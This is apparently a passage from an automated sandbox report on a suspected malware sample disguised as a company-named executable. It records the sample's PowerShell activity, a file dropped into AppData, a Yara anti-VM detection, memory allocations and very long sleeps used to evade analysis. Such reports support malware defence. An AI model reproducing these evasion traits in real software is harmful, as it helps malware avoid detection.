              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 5130000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A680000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B680000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: BAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: CAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: DAE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 5340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: AEB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: B340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: C340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: D340000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 1290000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 2C30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeMemory allocated: 2A50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1640000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3110000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2F10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 8F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 7AB0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9F00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: AF00000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B530000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C530000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C20000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2950000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 26C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1770000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 3500000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 1890000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 9080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 7BF0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: A080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: B660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: C660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: D660000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: F10000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 2B50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeMemory allocated: 11B0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4111Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 795Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6522Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWindow / User API: threadDelayed 2887Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeWindow / User API: threadDelayed 6926Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7918
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1704
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8827
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 650
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7198
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2461
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 1892Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 4111 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 795 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 7136Thread sleep time: -29514790517935264s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720Thread sleep count: 2887 > 30Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe TID: 3720Thread sleep count: 6926 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 8827 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 650 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7204Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 6148Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeFile Volume queried: C:\ FullSizeInformation
